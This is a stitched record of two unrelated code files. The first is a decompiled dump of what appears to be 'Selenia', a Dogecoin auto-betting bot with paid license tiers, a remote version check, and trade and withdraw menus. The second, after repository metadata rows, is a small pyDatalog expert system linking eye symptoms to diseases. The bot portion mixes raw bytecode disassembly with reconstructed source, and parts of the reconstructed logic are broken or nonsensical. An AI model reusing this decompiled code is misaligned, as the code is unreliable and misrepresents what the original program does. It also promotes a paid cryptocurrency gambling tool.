846 LOAD_CONST 91 ('Server Down Try Again or Check Latest Version Script')
848 BINARY_ADD
850 LOAD_NAME 13 (putih)
852 BINARY_ADD
854 CALL_FUNCTION 1
856 POP_TOP
542 858 LOAD_NAME 35 (print)
860 LOAD_CONST 87 ('Server Status Code [')
862 LOAD_NAME 77 (status)
864 LOAD_CONST 88 (']')
866 CALL_FUNCTION 3
868 POP_TOP
543 870 LOAD_NAME 35 (print)
872 LOAD_NAME 16 (merah)
874 LOAD_CONST 92 ('ERROR CONNECTION TRY AGAIN')
876 LOAD_NAME 13 (putih)
878 BINARY_ADD
880 CALL_FUNCTION 2
882 POP_TOP
544 884 LOAD_NAME 1 (sys)
886 LOAD_METHOD 36 (exit)
888 CALL_METHOD 0
890 POP_TOP
892 POP_BLOCK
894 BEGIN_FINALLY
>> 896 LOAD_CONST 1 (None)
898 STORE_NAME 82 (e)
900 DELETE_NAME 82 (e)
902 END_FINALLY
904 POP_EXCEPT
906 JUMP_FORWARD 2 (to 910)
>> 908 END_FINALLY
if StopLoseBalance == '0' or StopLoseBalance == 0:
StopLoseBalance = -999999999999999999999999999
else:
if StopLoseBalance != '0' or (StopLoseBalance != 0):
StopLoseBalance = StopLoseBalance * -100000000
Currency = 'doge'
statslogin = 'Offline'
limit = 0
try:
os.system('clear')
srv = scr.get('https://layscape.xyz/selenia/info.php')
status = srv.status_code
print('Server Status Code [', status, ']')
if status == 200:
print(hijau + 'Alive' + putih)
info = srv.json()
version = info['versi']
else:
pass
except Exception as e:
try:
print(merah + 'Server Down Try Again or Check Latest Version Script' + putih)
print('Server Status Code [', status, ']')
print(merah, 'ERROR CONNECTION TRY AGAIN' + putih)
sys.exit()
finally:
e = None
del e
545 >> 910 LOAD_NAME 77 (status)
912 LOAD_CONST 33 (200)
914 COMPARE_OP 2 (==)
916 EXTENDED_ARG 8
918 POP_JUMP_IF_FALSE 2064
546 920 SETUP_FINALLY 36 (to 958)
547 922 LOAD_CONST 93 ('a=GetBalance&s=')
924 LOAD_GLOBAL 83 (ses)
926 BINARY_ADD
928 LOAD_CONST 94 ('&Currency=doge')
930 BINARY_ADD
932 STORE_NAME 84 (getbalance)
548 934 LOAD_NAME 64 (post)
936 LOAD_NAME 84 (getbalance)
938 CALL_FUNCTION 1
940 POP_TOP
549 942 LOAD_GLOBAL 85 (req)
944 LOAD_CONST 95 ('Balance')
946 BINARY_SUBSCR
948 LOAD_CONST 43 (100000000)
950 BINARY_TRUE_DIVIDE
952 STORE_GLOBAL 86 (dogebalance)
954 POP_BLOCK
956 JUMP_FORWARD 12 (to 970)
550 >> 958 POP_TOP
960 POP_TOP
962 POP_TOP
551 964 POP_EXCEPT
966 JUMP_FORWARD 2 (to 970)
968 END_FINALLY
552 >> 970 LOAD_NAME 3 (time)
972 LOAD_METHOD 87 (sleep)
974 LOAD_CONST 37 (1)
976 CALL_METHOD 1
978 POP_TOP
553 980 LOAD_NAME 2 (os)
982 LOAD_METHOD 73 (system)
984 LOAD_CONST 85 ('clear')
986 CALL_METHOD 1
988 POP_TOP
554 990 LOAD_NAME 35 (print)
992 LOAD_CONST 96 ('\x1b[1;31m====================================================\x1b[0m')
994 CALL_FUNCTION 1
996 POP_TOP
555 998 LOAD_NAME 35 (print)
1000 LOAD_CONST 97 ('\x1b[1;32m[+]\x1b[0m \x1b[0;36mDO WITH YOUR OWN RISK \x1b[0m \x1b[1;32m[+]\x1b[0m')
1002 CALL_FUNCTION 1
1004 POP_TOP
556 1006 LOAD_NAME 35 (print)
1008 LOAD_CONST 98 ('\x1b[1;32m[+]\x1b[0m \x1b[1;33mCreator : Layscape\x1b[0m \x1b[1;32m[+]\x1b[0m')
1010 CALL_FUNCTION 1
1012 POP_TOP
557 1014 LOAD_NAME 35 (print)
1016 LOAD_CONST 99 ('\x1b[1;32m[+]\x1b[0m \x1b[1;33mVersi Script V3.0\x1b[0m \x1b[1;32m[+]\x1b[0m')
1018 CALL_FUNCTION 1
1020 POP_TOP
558 1022 LOAD_NAME 35 (print)
1024 LOAD_CONST 100 ('\x1b[1;32m[+]\x1b[0m \x1b[1;33mJoin Group Whatsapp For News and Update\x1b[0m \x1b[1;32m[+]\x1b[0m')
1026 CALL_FUNCTION 1
1028 POP_TOP
559 1030 LOAD_NAME 35 (print)
1032 LOAD_CONST 96 ('\x1b[1;31m====================================================\x1b[0m')
1034 CALL_FUNCTION 1
1036 POP_TOP
560 1038 LOAD_NAME 35 (print)
1040 LOAD_CONST 101 ("Disclaimer : \nScript Not Working Don't Blame Creator :). \nRead/Watch How to Use As Well")
1042 CALL_FUNCTION 1
1044 POP_TOP
561 1046 LOAD_NAME 35 (print)
1048 LOAD_CONST 96 ('\x1b[1;31m====================================================\x1b[0m')
1050 CALL_FUNCTION 1
1052 POP_TOP
562 1054 LOAD_NAME 35 (print)
1056 LOAD_NAME 14 (kuning)
1058 LOAD_CONST 102 ('Info :')
1060 BINARY_ADD
1062 LOAD_NAME 79 (info)
1064 LOAD_CONST 103 ('notice5')
1066 BINARY_SUBSCR
1068 BINARY_ADD
1070 LOAD_NAME 13 (putih)
1072 BINARY_ADD
1074 CALL_FUNCTION 1
1076 POP_TOP
563 1078 LOAD_NAME 35 (print)
1080 LOAD_CONST 96 ('\x1b[1;31m====================================================\x1b[0m')
1082 CALL_FUNCTION 1
1084 POP_TOP
564 1086 LOAD_NAME 35 (print)
1088 LOAD_NAME 15 (hijau)
1090 LOAD_CONST 104 ('Information Script :')
1092 BINARY_ADD
1094 CALL_FUNCTION 1
1096 POP_TOP
565 1098 LOAD_NAME 35 (print)
1100 LOAD_CONST 105 ('Versi :')
1102 LOAD_NAME 79 (info)
1104 LOAD_CONST 90 ('versi')
1106 BINARY_SUBSCR
1108 CALL_FUNCTION 2
1110 POP_TOP
566 1112 LOAD_NAME 35 (print)
1114 LOAD_CONST 106 ('Creator :')
1116 LOAD_NAME 79 (info)
1118 LOAD_CONST 107 ('created')
1120 BINARY_SUBSCR
1122 CALL_FUNCTION 2
1124 POP_TOP
567 1126 LOAD_NAME 35 (print)
1128 LOAD_CONST 108 ('Youtube :')
1130 LOAD_NAME 79 (info)
1132 LOAD_CONST 109 ('youtube')
1134 BINARY_SUBSCR
1136 CALL_FUNCTION 2
1138 POP_TOP
568 1140 LOAD_NAME 35 (print)
1142 LOAD_CONST 110 ('Script :')
1144 LOAD_NAME 79 (info)
1146 LOAD_CONST 111 ('script')
1148 BINARY_SUBSCR
1150 LOAD_NAME 13 (putih)
1152 BINARY_ADD
1154 CALL_FUNCTION 2
1156 POP_TOP
569 1158 LOAD_CONST 112 ('3.0')
1160 LOAD_NAME 80 (version)
1162 COMPARE_OP 2 (==)
1164 EXTENDED_ARG 4
1166 POP_JUMP_IF_FALSE 1186 # this is if
570 1168 LOAD_NAME 35 (print)
1170 LOAD_NAME 15 (hijau)
1172 LOAD_CONST 113 ('New Version')
1174 BINARY_ADD
1176 LOAD_NAME 13 (putih)
1178 BINARY_ADD
1180 CALL_FUNCTION 1
1182 POP_TOP
1184 JUMP_FORWARD 74 (to 1260)
571 >> 1186 LOAD_NAME 80 (version)
1188 LOAD_CONST 112 ('3.0')
1190 COMPARE_OP 4 (>)
1192 EXTENDED_ARG 4
1194 POP_JUMP_IF_FALSE 1260 # this is elif
572 1196 LOAD_NAME 35 (print)
1198 LOAD_NAME 16 (merah)
1200 LOAD_CONST 114 ('New Version ')
1202 BINARY_ADD
1204 LOAD_NAME 80 (version)
1206 BINARY_ADD
1208 LOAD_CONST 115 (' Release')
1210 BINARY_ADD
1212 LOAD_NAME 13 (putih)
1214 BINARY_ADD
1216 CALL_FUNCTION 1
1218 POP_TOP
573 1220 LOAD_NAME 35 (print)
1222 LOAD_NAME 16 (merah)
1224 LOAD_CONST 116 ('Please Update')
1226 BINARY_ADD
1228 LOAD_NAME 13 (putih)
1230 BINARY_ADD
1232 CALL_FUNCTION 1
1234 POP_TOP
574 1236 LOAD_NAME 35 (print)
1238 LOAD_NAME 15 (hijau)
1240 LOAD_CONST 117 ('Type This Command:\n- git stash\n- git pull')
1242 BINARY_ADD
1244 LOAD_NAME 13 (putih)
1246 BINARY_ADD
1248 CALL_FUNCTION 1
1250 POP_TOP
575 1252 LOAD_NAME 1 (sys)
1254 LOAD_METHOD 36 (exit)
1256 CALL_METHOD 0
1258 POP_TOP
576 >> 1260 LOAD_NAME 35 (print)
1262 LOAD_NAME 14 (kuning)
1264 LOAD_CONST 118 ('Notice :\n')
1266 BINARY_ADD
1268 LOAD_NAME 79 (info)
1270 LOAD_CONST 119 ('notice1')
1272 BINARY_SUBSCR
1274 BINARY_ADD
1276 CALL_FUNCTION 1
1278 POP_TOP
577 1280 LOAD_NAME 35 (print)
1282 LOAD_NAME 79 (info)
1284 LOAD_CONST 120 ('notice2')
1286 BINARY_SUBSCR
1288 CALL_FUNCTION 1
1290 POP_TOP
578 1292 LOAD_NAME 35 (print)
1294 LOAD_NAME 79 (info)
1296 LOAD_CONST 121 ('notice3')
1298 BINARY_SUBSCR
1300 CALL_FUNCTION 1
1302 POP_TOP
579 1304 LOAD_NAME 35 (print)
1306 LOAD_NAME 79 (info)
1308 LOAD_CONST 122 ('notice4')
1310 BINARY_SUBSCR
1312 CALL_FUNCTION 1
1314 POP_TOP
580 1316 LOAD_NAME 35 (print)
1318 LOAD_CONST 123 ('- Attention to Your Connection')
1320 LOAD_NAME 13 (putih)
1322 BINARY_ADD
1324 CALL_FUNCTION 1
1326 POP_TOP
581 1328 LOAD_NAME 35 (print)
1330 LOAD_CONST 124 ('Buy License Here : \nhttps://layscape.xyz/selenia/license')
1332 CALL_FUNCTION 1
1334 POP_TOP
582 1336 LOAD_NAME 35 (print)
1338 LOAD_CONST 125 ('')
1340 CALL_FUNCTION 1
1342 POP_TOP
583 1344 LOAD_GLOBAL 60 (statslogin)
1346 LOAD_CONST 126 ('Online')
1348 COMPARE_OP 2 (==)
1350 EXTENDED_ARG 6
1352 POP_JUMP_IF_FALSE 1666
584 1354 LOAD_NAME 35 (print)
1356 LOAD_NAME 15 (hijau)
1358 LOAD_CONST 127 ('Re-Login for Refresh')
1360 BINARY_ADD
1362 LOAD_NAME 13 (putih)
1364 CALL_FUNCTION 2
1366 POP_TOP
if status == 200:
try:
getbalance = 'a=GetBalance&s=' + ses + '&Currency=doge'
post(getbalance)
dogebalance = req['Balance'] / 100000000
except:
pass
else:
time.sleep(1)
os.system('clear')
print('\x1b[1;31m====================================================\x1b[0m')
print('\x1b[1;32m[+]\x1b[0m \x1b[0;36mDO WITH YOUR OWN RISK \x1b[0m \x1b[1;32m[+]\x1b[0m')
print('\x1b[1;32m[+]\x1b[0m \x1b[1;33mCreator : Layscape\x1b[0m \x1b[1;32m[+]\x1b[0m')
print('\x1b[1;32m[+]\x1b[0m \x1b[1;33mVersi Script V3.0\x1b[0m \x1b[1;32m[+]\x1b[0m')
print('\x1b[1;32m[+]\x1b[0m \x1b[1;33mJoin Group Whatsapp For News and Update\x1b[0m \x1b[1;32m[+]\x1b[0m')
print('\x1b[1;31m====================================================\x1b[0m')
print("Disclaimer : \nScript Not Working Don't Blame Creator :). \nRead/Watch How to Use As Well")
print('\x1b[1;31m====================================================\x1b[0m')
print(kuning + 'Info :' + info['notice5'] + putih)
print('\x1b[1;31m====================================================\x1b[0m')
print(hijau + 'Information Script :')
print('Versi :', info['versi'])
print('Creator :', info['created'])
print('Youtube :', info['youtube'])
print('Script :', info['script'] + putih)
if '3.0' == version:
print(hijau + 'New Version' + putih)
elif version > '3.0': # -> float required not str
print(merah + 'New Version ' + version + ' Release' + putih)
print(merah + 'Please Update' + putih)
print(hijau + 'Type This Command:\n- git stash\n- git pull' + putih)
sys.exit()
print(kuning + 'Notice :\n' + info['notice1'])
print(info['notice2'])
print(info['notice3'])
print(info['notice4'])
print('- Attention to Your Connection' + putih)
print('Buy License Here : \nhttps://layscape.xyz/selenia/license')
print('')
if statslogin == 'Online':
print(hijau + 'Re-Login for Refresh', putih)
else:
pass
585 1368 SETUP_FINALLY 56 (to 1426)
586 1370 LOAD_GLOBAL 88 (Expired)
1372 LOAD_CONST 0 (0)
1374 COMPARE_OP 1 (<=)
1376 EXTENDED_ARG 5
1378 POP_JUMP_IF_FALSE 1422
587 1380 LOAD_NAME 35 (print)
1382 LOAD_NAME 16 (merah)
1384 LOAD_CONST 128 ('License Out of Date')
1386 BINARY_ADD
1388 LOAD_NAME 13 (putih)
1390 BINARY_ADD
1392 CALL_FUNCTION 1
1394 POP_TOP
588 1396 LOAD_NAME 35 (print)
1398 LOAD_NAME 14 (kuning)
1400 LOAD_CONST 129 ('Buy New One')
1402 BINARY_ADD
1404 LOAD_NAME 13 (putih)
1406 BINARY_ADD
1408 CALL_FUNCTION 1
1410 POP_TOP
589 1412 LOAD_NAME 1 (sys)
1414 LOAD_METHOD 36 (exit)
1416 CALL_METHOD 0
1418 POP_TOP
1420 JUMP_FORWARD 0 (to 1422)
591 >> 1422 POP_BLOCK
1424 JUMP_FORWARD 12 (to 1438)
592 >> 1426 POP_TOP
1428 POP_TOP
1430 POP_TOP
593 1432 POP_EXCEPT
1434 JUMP_FORWARD 2 (to 1438)
1436 END_FINALLY
594 >> 1438 LOAD_NAME 35 (print)
1440 LOAD_CONST 130 ('Informasi Status Login :')
1442 LOAD_NAME 15 (hijau)
1444 LOAD_GLOBAL 60 (statslogin)
1446 BINARY_ADD
1448 LOAD_NAME 13 (putih)
1450 BINARY_ADD
1452 CALL_FUNCTION 2
1454 POP_TOP
595 1456 LOAD_NAME 35 (print)
1458 LOAD_CONST 131 ('Account ID :')
1460 LOAD_GLOBAL 89 (accid)
1462 CALL_FUNCTION 2
1464 POP_TOP
596 1466 LOAD_NAME 35 (print)
1468 LOAD_CONST 132 ('Username :')
1470 LOAD_NAME 25 (Username)
1472 CALL_FUNCTION 2
1474 POP_TOP
597 1476 LOAD_NAME 35 (print)
1478 LOAD_CONST 133 ('Doge Balance :')
1480 LOAD_NAME 22 (num_format)
1482 LOAD_GLOBAL 86 (dogebalance)
1484 CALL_FUNCTION 1
1486 CALL_FUNCTION 2
1488 POP_TOP
598 1490 LOAD_NAME 35 (print)
1492 LOAD_CONST 134 ('Doge Deposit Wallet :')
1494 LOAD_GLOBAL 90 (dogewallet)
1496 CALL_FUNCTION 2
1498 POP_TOP
599 1500 LOAD_NAME 35 (print)
1502 LOAD_CONST 135 ('License Type : ')
1504 LOAD_NAME 91 (logintype)
1506 CALL_FUNCTION 2
1508 POP_TOP
600 1510 LOAD_NAME 91 (logintype)
1512 LOAD_CONST 136 ('Free License')
1514 COMPARE_OP 2 (==)
1516 EXTENDED_ARG 6
1518 POP_JUMP_IF_FALSE 1560
601 1520 LOAD_CONST 62 ('Offline')
1522 STORE_GLOBAL 92 (statssrv)
602 1524 LOAD_NAME 35 (print)
1526 LOAD_CONST 137 ('Expired Date : None')
1528 CALL_FUNCTION 1
1530 POP_TOP
603 1532 LOAD_NAME 35 (print)
1534 LOAD_CONST 138 ('SG Server Status :')
1536 LOAD_NAME 16 (merah)
1538 LOAD_GLOBAL 92 (statssrv)
1540 BINARY_ADD
1542 LOAD_NAME 13 (putih)
1544 BINARY_ADD
1546 CALL_FUNCTION 2
1548 POP_TOP
604 1550 LOAD_NAME 35 (print)
1552 LOAD_CONST 139 ('Max Balance : 150 DOGE')
1554 CALL_FUNCTION 1
1556 POP_TOP
1558 JUMP_FORWARD 96 (to 1656)
605 >> 1560 LOAD_NAME 91 (logintype)
1562 LOAD_CONST 140 ('Premium License')
1564 COMPARE_OP 2 (==)
1566 EXTENDED_ARG 6
1568 POP_JUMP_IF_TRUE 1580
1570 LOAD_NAME 91 (logintype)
1572 LOAD_CONST 141 ('Platinum License')
1574 COMPARE_OP 2 (==)
1576 EXTENDED_ARG 6
1578 POP_JUMP_IF_FALSE 1656
606 >> 1580 LOAD_CONST 126 ('Online')
1582 STORE_GLOBAL 92 (statssrv)
607 1584 LOAD_NAME 6 (datetime)
1586 LOAD_METHOD 93 (now)
1588 CALL_METHOD 0
1590 STORE_NAME 94 (mydatetime)
608 1592 LOAD_NAME 35 (print)
1594 LOAD_CONST 138 ('SG Server Status :')
1596 LOAD_NAME 15 (hijau)
1598 LOAD_GLOBAL 92 (statssrv)
1600 BINARY_ADD
1602 LOAD_NAME 13 (putih)
1604 BINARY_ADD
1606 CALL_FUNCTION 2
1608 POP_TOP
609 1610 LOAD_NAME 35 (print)
1612 LOAD_CONST 142 ('Date :')
1614 LOAD_NAME 94 (mydatetime)
1616 LOAD_METHOD 95 (strftime)
1618 LOAD_CONST 143 ('%Y-%m-%d')
1620 CALL_METHOD 1
1622 CALL_FUNCTION 2
1624 POP_TOP
610 1626 LOAD_NAME 35 (print)
1628 LOAD_CONST 144 ('Expired Date :')
1630 LOAD_GLOBAL 96 (userdate)
1632 CALL_FUNCTION 2
1634 POP_TOP
611 1636 LOAD_NAME 35 (print)
1638 LOAD_CONST 145 ('Expired In :')
1640 LOAD_GLOBAL 88 (Expired)
1642 LOAD_CONST 146 ('Days')
1644 CALL_FUNCTION 3
1646 POP_TOP
612 1648 LOAD_NAME 35 (print)
1650 LOAD_CONST 147 ('Max Balance : Unlimited')
1652 CALL_FUNCTION 1
1654 POP_TOP
613 >> 1656 LOAD_NAME 35 (print)
1658 LOAD_CONST 148 ('Currency Available : DOGE')
1660 CALL_FUNCTION 1
1662 POP_TOP
1664 JUMP_FORWARD 10 (to 1676)
615 >> 1666 LOAD_NAME 35 (print)
1668 LOAD_CONST 149 ('Information Status Login :')
1670 LOAD_GLOBAL 60 (statslogin)
1672 CALL_FUNCTION 2
1674 POP_TOP
617 >> 1676 LOAD_NAME 35 (print)
1678 LOAD_NAME 15 (hijau)
1680 LOAD_CONST 150 ('\nPilih Menu :')
1682 BINARY_ADD
1684 CALL_FUNCTION 1
1686 POP_TOP
618 1688 LOAD_NAME 35 (print)
1690 LOAD_NAME 14 (kuning)
1692 LOAD_CONST 151 ('1. Login Premium License')
1694 BINARY_ADD
1696 CALL_FUNCTION 1
1698 POP_TOP
619 1700 LOAD_NAME 35 (print)
1702 LOAD_CONST 152 ('2. Login For Free')
1704 CALL_FUNCTION 1
1706 POP_TOP
620 1708 LOAD_NAME 35 (print)
1710 LOAD_CONST 153 ('3. Login Platinum License')
1712 CALL_FUNCTION 1
1714 POP_TOP
621 1716 LOAD_NAME 35 (print)
1718 LOAD_CONST 154 ('4. Register Account SELENIA')
1720 CALL_FUNCTION 1
1722 POP_TOP
622 1724 LOAD_NAME 35 (print)
1726 LOAD_CONST 155 ('5. Price List License')
1728 CALL_FUNCTION 1
1730 POP_TOP
623 1732 LOAD_NAME 35 (print)
1734 LOAD_CONST 156 ('0. Keluar')
1736 CALL_FUNCTION 1
1738 POP_TOP
624 1740 LOAD_GLOBAL 60 (statslogin)
1742 LOAD_CONST 126 ('Online')
1744 COMPARE_OP 2 (==)
1746 EXTENDED_ARG 6
1748 POP_JUMP_IF_FALSE 1774
625 1750 LOAD_NAME 35 (print)
1752 LOAD_CONST 157 ('6. Start Trade')
1754 CALL_FUNCTION 1
1756 POP_TOP
626 1758 LOAD_NAME 35 (print)
1760 LOAD_CONST 158 ('7. Withdraw')
1762 CALL_FUNCTION 1
1764 POP_TOP
627 1766 LOAD_NAME 35 (print)
1768 LOAD_CONST 159 ('8. Account Information')
1770 CALL_FUNCTION 1
1772 POP_TOP
629 >> 1774 LOAD_NAME 97 (input)
1776 LOAD_CONST 160 ('==>')
1778 CALL_FUNCTION 1
1780 STORE_NAME 98 (smenu)
630 1782 LOAD_NAME 98 (smenu)
1784 LOAD_CONST 161 ('1')
1786 COMPARE_OP 2 (==)
1788 EXTENDED_ARG 7
1790 POP_JUMP_IF_FALSE 1820
631 1792 LOAD_CONST 0 (0)
1794 STORE_NAME 61 (limit)
632 1796 LOAD_CONST 140 ('Premium License')
1798 STORE_NAME 91 (logintype)
633 1800 LOAD_NAME 65 (login)
1802 CALL_FUNCTION 0
1804 POP_TOP
634 1806 LOAD_NAME 68 (verify)
1808 CALL_FUNCTION 0
1810 POP_TOP
635 1812 LOAD_NAME 70 (check_license)
1814 CALL_FUNCTION 0
1816 POP_TOP
1818 JUMP_FORWARD 30 (to 1850)
636 >> 1820 LOAD_NAME 98 (smenu)
1822 LOAD_CONST 162 ('2')
1824 COMPARE_OP 2 (==)
1826 EXTENDED_ARG 7
1828 POP_JUMP_IF_FALSE 1850
637 1830 LOAD_CONST 136 ('Free License')
1832 STORE_NAME 91 (logintype)
638 1834 LOAD_NAME 65 (login)
1836 CALL_FUNCTION 0
1838 POP_TOP
639 1840 LOAD_GLOBAL 86 (dogebalance)
1842 STORE_NAME 61 (limit)
640 1844 LOAD_NAME 68 (verify)
1846 CALL_FUNCTION 0
1848 POP_TOP
641 >> 1850 LOAD_NAME 98 (smenu)
1852 LOAD_CONST 163 ('3')
1854 COMPARE_OP 2 (==)
1856 EXTENDED_ARG 7
1858 POP_JUMP_IF_FALSE 1888
642 1860 LOAD_CONST 0 (0)
1862 STORE_NAME 61 (limit)
643 1864 LOAD_CONST 141 ('Platinum License')
1866 STORE_NAME 91 (logintype)
644 1868 LOAD_NAME 65 (login)
1870 CALL_FUNCTION 0
1872 POP_TOP
645 1874 LOAD_NAME 68 (verify)
1876 CALL_FUNCTION 0
1878 POP_TOP
646 1880 LOAD_NAME 71 (check_license_platinum)
1882 CALL_FUNCTION 0
1884 POP_TOP
1886 JUMP_FORWARD 172 (to 2060)
647 >> 1888 LOAD_NAME 98 (smenu)
1890 LOAD_CONST 164 ('4')
1892 COMPARE_OP 2 (==)
1894 EXTENDED_ARG 7
1896 POP_JUMP_IF_FALSE 1906
648 1898 LOAD_NAME 69 (register)
1900 CALL_FUNCTION 0
1902 POP_TOP
1904 JUMP_FORWARD 154 (to 2060)
649 >> 1906 LOAD_NAME 98 (smenu)
1908 LOAD_CONST 165 ('6')
1910 COMPARE_OP 2 (==)
1912 EXTENDED_ARG 7
1914 POP_JUMP_IF_FALSE 1958
1916 LOAD_GLOBAL 60 (statslogin)
1918 LOAD_CONST 126 ('Online')
1920 COMPARE_OP 2 (==)
1922 EXTENDED_ARG 7
1924 POP_JUMP_IF_FALSE 1958
650 1926 LOAD_NAME 91 (logintype)
1928 LOAD_CONST 136 ('Free License')
1930 COMPARE_OP 2 (==)
1932 EXTENDED_ARG 7
1934 POP_JUMP_IF_FALSE 1948
651 1936 LOAD_NAME 72 (gblnc)
1938 CALL_FUNCTION 0
1940 POP_TOP
652 1942 LOAD_GLOBAL 86 (dogebalance)
1944 STORE_NAME 61 (limit)
1946 JUMP_FORWARD 0 (to 1948)
655 >> 1948 LOAD_NAME 66 (autobet)
1950 LOAD_NAME 61 (limit)
1952 CALL_FUNCTION 1
1954 POP_TOP
1956 JUMP_FORWARD 102 (to 2060)
656 >> 1958 LOAD_NAME 98 (smenu)
1960 LOAD_CONST 166 ('5')
1962 COMPARE_OP 2 (==)
1964 EXTENDED_ARG 7
1966 POP_JUMP_IF_FALSE 1976
657 1968 LOAD_NAME 63 (harga_license)
1970 CALL_FUNCTION 0
1972 POP_TOP
1974 JUMP_FORWARD 84 (to 2060)
658 >> 1976 LOAD_NAME 98 (smenu)
1978 LOAD_CONST 167 ('7')
1980 COMPARE_OP 2 (==)
1982 EXTENDED_ARG 7
1984 POP_JUMP_IF_FALSE 2004
1986 LOAD_GLOBAL 60 (statslogin)
1988 LOAD_CONST 126 ('Online')
1990 COMPARE_OP 2 (==)
1992 EXTENDED_ARG 7
1994 POP_JUMP_IF_FALSE 2004
659 1996 LOAD_NAME 62 (withdraw)
1998 CALL_FUNCTION 0
2000 POP_TOP
2002 JUMP_FORWARD 56 (to 2060)
660 >> 2004 LOAD_NAME 98 (smenu)
2006 LOAD_CONST 168 ('8')
2008 COMPARE_OP 2 (==)
2010 EXTENDED_ARG 7
2012 POP_JUMP_IF_FALSE 2032
2014 LOAD_GLOBAL 60 (statslogin)
2016 LOAD_CONST 126 ('Online')
2018 COMPARE_OP 2 (==)
2020 EXTENDED_ARG 7
2022 POP_JUMP_IF_FALSE 2032
661 2024 LOAD_NAME 67 (ainfo)
2026 CALL_FUNCTION 0
2028 POP_TOP
2030 JUMP_FORWARD 28 (to 2060)
662 >> 2032 LOAD_NAME 98 (smenu)
2034 LOAD_CONST 36 ('0')
2036 COMPARE_OP 2 (==)
2038 EXTENDED_ARG 8
2040 POP_JUMP_IF_FALSE 2052
663 2042 LOAD_NAME 1 (sys)
2044 LOAD_METHOD 36 (exit)
2046 CALL_METHOD 0
2048 POP_TOP
2050 JUMP_FORWARD 8 (to 2060)
665 >> 2052 LOAD_NAME 35 (print)
2054 LOAD_CONST 169 ('NO MENU SELECTED')
2056 CALL_FUNCTION 1
2058 POP_TOP
>> 2060 EXTENDED_ARG 3
2062 JUMP_ABSOLUTE 910
try:
if Expired <= 0:
print(merah + 'License Out of Date' + putih)
print(kuning + 'Buy New One' + putih)
sys.exit()
else:
pass
except:
pass
else:
print('Informasi Status Login :', hijau + statslogin + putih)
print('Account ID :', accid)
print('Username :', Username)
print('Doge Balance :', num_format(dogebalance))
print('Doge Deposit Wallet :', dogewallet)
print('License Type : ', logintype)
if logintype == 'Free License':
statssrv = 'Offline'
print('Expired Date : None')
print('SG Server Status :', merah + statssrv + putih)
print('Max Balance : 150 DOGE')
else:
if not logintype == 'Premium License':
if logintype == 'Platinum License':
pass
statssrv = 'Online'
mydatetime = datetime.now()
print('SG Server Status :', hijau + statssrv + putih)
print('Date :', mydatetime.strftime('%Y-%m-%d'))
print('Expired Date :', userdate)
print('Expired In :', Expired, 'Days')
print('Max Balance : Unlimited')
print('Currency Available : DOGE')
print('Information Status Login :', statslogin)
print(hijau + '\nPilih Menu :')
print(kuning + '1. Login Premium License')
print('2. Login For Free')
print('3. Login Platinum License')
print('4. Register Account SELENIA')
print('5. Price List License')
print('0. Keluar')
if statslogin == 'Online':
print('6. Start Trade')
print('7. Withdraw')
print('8. Account Information')
smenu = input('==>')
if smenu == '1':
limit = 0
logintype = 'Premium License'
login()
verify()
check_license()
if smenu == '2':
logintype = 'Free License'
login()
limit = dogebalance
verify()
if smenu == '3':
limit = 0
logintype = 'Platinum License'
login()
verify()
check_license_platinum()
if smenu == '4':
register()
if smenu == '6':
if statslogin == 'Online':
if logintype == 'Free License':
gblnc()
limit = dogebalance
else:
pass
autobet(limit)
if smenu == '5':
harga_license()
if smenu == '7':
if statslogin == 'Online':
withdraw()
if smenu == '8':
if statslogin == 'Online':
ainfo()
if smenu == '0':
sys.exit()
print('NO MENU SELECTED')
667 >> 2064 LOAD_CONST 1 (None)
2066 RETURN_VALUE
| [
"noreply@github.com"
] | rendy026.noreply@github.com |
b9250a89c4f9d1cd4dad23020d9237cf7c64330c | b2506ad4d4800bbc6c618619d29cc6f5c3a4838d | /yeux_symptomes.py | d71b602fab3d658b9f46f42aefa07d3fc0f425f4 | [] | no_license | EDU-FRANCK-JUBIN/exos-systeme-expert-SiegKord | 4f6ed358e557218902585fdc045a3f7039067154 | c242ef7085f7a13fcf915fede8c92bca5108c3f6 | refs/heads/master | 2020-09-21T16:57:51.720379 | 2019-12-05T22:15:16 | 2019-12-05T22:15:16 | 224,857,316 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,633 | py | # -*- coding: utf-8 -*-
"""
Created on Thu Dec 5 15:51:33 2019
@author: Nicolas
"""
from pyDatalog import pyDatalog
pyDatalog.clear()
pyDatalog.create_terms('X, G001, G002, G003, G004, G005, G006, G007, G008, G009, G010, G011, G012, G013, G014, G015, G016, G017, G018, G019, G020, G021, G022, G023, P01, P02, P03, P04, P05, P06, P07, P08')
'''
P0X : Maladies
G0XX : Symptômes
'''
P01(X) <= G001(X) & G002(X) & G003(X) & G004(X)
P02(X) <= G001(X) & G002(X) & G005(X) & G006(X)
P03(X) <= G007(X) & G008(X)
P04(X) <= G009(X) & G010(X) & G011(X) & G012(X)
P05(X) <= G013(X) & G014(X) & G015(X) & G016(X)
P06(X) <= G010(X) & G015(X) & G016(X) & G017(X) & G018(X) & G019(X)
P07(X) <= G010(X) & G019(X) & G020(X) & G021(X)
P08(X) <= G001(X) & G010(X) & G019(X) & G022(X) & G023(X)
+G001('default')
+G002('default')
+G003('default')
+G004('default')
+G005('default')
+G006('default')
+G007('default')
+G008('default')
+G009('default')
+G010('default')
+G011('default')
+G012('default')
+G013('default')
+G014('default')
+G015('default')
+G016('default')
+G017('default')
+G018('default')
+G019('default')
+G020('default')
+G021('default')
+G022('default')
+G023('default')
+G013('Personne1')
+G014('Personne1')
+G015('Personne1')
+G016('Personne1')
+G010('Personne2')
+G015('Personne2')
+G016('Personne2')
+G017('Personne2')
+G018('Personne2')
+G019('Personne2')
'''
Qui a la maladie de "Conjonctiviste en allergie ?
'''
print(pyDatalog.ask('P05(X)'))
'''
Qui a la maladie de la Blépharite ?
'''
print(pyDatalog.ask('P01(X)'))
'''
Quel patient souffre du symptôme "Yeux qui brillent ?"
'''
print(pyDatalog.ask('G016(X)'))
| [
"nicolas.ferrer@ynov.com"
] | nicolas.ferrer@ynov.com |
